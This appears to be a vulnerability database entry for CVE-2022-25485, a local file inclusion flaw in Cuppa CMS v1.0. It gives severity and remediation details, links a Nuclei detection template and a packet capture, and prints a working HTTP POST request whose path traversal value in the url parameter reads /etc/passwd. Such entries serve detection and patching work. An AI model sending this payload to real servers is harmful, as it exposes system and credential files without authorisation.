| Title | Cuppa CMS v1.0 - Local File Inclusion |
|---|---|
| Author | theamanrawat |
| Severity | High |
| Impact | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. |
| Remediation | Upgrade to the latest version of Cuppa CMS or apply the vendor-provided patch to fix the LFI vulnerability. |
| CVSS Score | 7.8 |
| EPSS Score | 0.3763 |
| CVE ID | CVE-2022-25485 |
| CWE ID | CWE-829 |
| Tags | cve cve2022 lfi cuppa cuppacms vkev vuln |
CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertLightbox.php.
POST /alerts/alertLightbox.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.10
Connection: close
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
url=../../../../../../../../../../../etc/passwd
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-25485.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-25485.pcap
N/AN/A